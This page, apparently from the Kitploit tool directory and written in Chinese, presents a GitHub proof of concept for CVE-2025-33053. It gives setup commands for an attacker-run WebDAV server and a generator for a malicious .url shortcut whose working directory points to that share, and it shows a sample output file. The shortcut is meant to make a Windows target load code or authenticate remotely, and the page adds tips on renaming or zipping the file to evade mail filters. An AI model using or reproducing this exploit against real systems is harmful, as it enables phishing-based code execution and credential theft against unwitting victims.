Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-33053-Proof-Of-Concept — CVE-2025-33053 概念验证(PoC) | Kitploit
工具/GitHubGitHub/devbuihieu/cve-2025-33053-proof-of-concept
Payload生成漏洞利用横向移动钓鱼攻击Web安全渗透测试命令与控制社会工程学红队

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
devbuihieu/cve-2025-33053-proof-of-concept

CVE-2025-33053-Proof-Of-Concept

CVE-2025-33053 概念验证(PoC)

查看仓库
641641年前Kitploit 审核通过

CVE-2025-33053 概念验证

本仓库提供脚本,用于在 Ubuntu 上使用 Apache2 自动部署 WebDAV 服务器,并生成恶意的 .url 快捷方式文件,供渗透测试、红队演练或横向移动模拟使用。


📁 内容

  • setup_webdav.sh – Bash 脚本,用于配置 Apache2 + WebDAV。
  • setup_webdav.py – 上述脚本的 Python 版本。
  • gen_url.py – Python 脚本,用于生成包含 UNC/WebDAV 路径的 .url 快捷方式文件。
  • README.md – 文档。

🔧 要求

  • 操作系统:Ubuntu 20.04 或更新版本(兼容 Debian)
  • 根权限(sudo)
  • Python 3.x

🚀 安装说明

1. WebDAV 服务器(通过 Bash)

root@kitploit:~
sudo bash setup_webdav.sh

或使用 Python:

root@kitploit:~
sudo python3 setup_webdav.py

默认情况下,该脚本会:

  • 安装 Apache 及所需的 WebDAV 模块。
  • 在 /var/www/webdav 创建共享目录。
  • 启用 DAV 和 DAV_FS 模块。
  • 创建 DavLockDB 目录(防止 Apache DAV 锁定错误)。
  • 重启 Apache 服务。

📎 WebDAV 路径:http://<你的IP>/webdav/


💣 生成恶意 .url 快捷方式

用法示例:

root@kitploit:~
python3 gen_url.py --ip 192.168.1.100 --out doc.url

全部选项:

root@kitploit:~
python3 gen_url.py \
  --ip 《YOUR IP ADDRESS》\
  --share 《YOUR SHARE NAME》(Default: webdav) \
  --out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
  --exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
  --icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
  --index 13 \
  --modified 20F06BA06D07BD014D

这将创建一个如下的 .url 文件:

root@kitploit:~
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D

📌 在某些配置下,点击该文件可能导致目标系统自动连接你的 WebDAV 服务器(用于身份验证或 DLL 投递)。


🔒 安全测试注意事项

  • 禁用防火墙(或开放 80 端口),如果在本地网络测试:
    root@kitploit:~
    sudo ufw allow 80
    
  • .url 文件的执行效果可能因以下因素而异:
    • 组策略限制
    • 应用程序默认设置
    • 邮件客户端(Gmail 可能会清理这些文件)
  • 你可能需要将 .url 压缩或重命名为 .txt 以绕过过滤器。

⚠️ 法律免责声明

本仓库仅用于教育和授权的渗透测试。
请勿在未经拥有或授权的系统上使用这些脚本。


🧠 参考

  • WebDAV 服务器搭建 - LinuxConfig.org
  • WebDAV Apache 配置 - Peter Girnus
  • Microsoft WebDAV 文档

📬 联系我们

如有疑问或道德红队演练请求,请通过 GitHub Issues 联系。

下载工具